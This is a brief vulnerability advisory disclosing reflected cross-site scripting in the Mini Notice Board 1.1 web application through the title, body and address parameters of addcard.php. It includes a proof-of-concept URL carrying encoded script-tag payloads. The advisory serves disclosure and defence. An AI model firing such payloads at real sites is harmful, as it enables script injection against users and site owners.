mininoticeboard_v1.1 XSS Vulnerabilities ========================================= Discovered by N_A, N_A[at]tutanota.com ======================================= Vendor has been notified Description ============ Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car or lawnmower or want to provide services, they can simply write a card. It supports unlimited Regions. https://sourceforge.net/projects/mininoticeboard Vulnerabilities ================ XSS attacks can be executed via the GET method. Vulnerable variables are: title, body and address. POC Exploit String ==================== http://127.0.0.1/mininoticeboard/addcard.php?title=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&body=%3Cscript%3Ealert%28%272%27%29%3B%3C%2Fscript%3E&tel=555&contact=pentest&address=%3Cscript%3Ealert%28%273%27%29%3B%3C%2Fscript%3E&submit=Add+Card Email ====== N_A[at]tutanota.com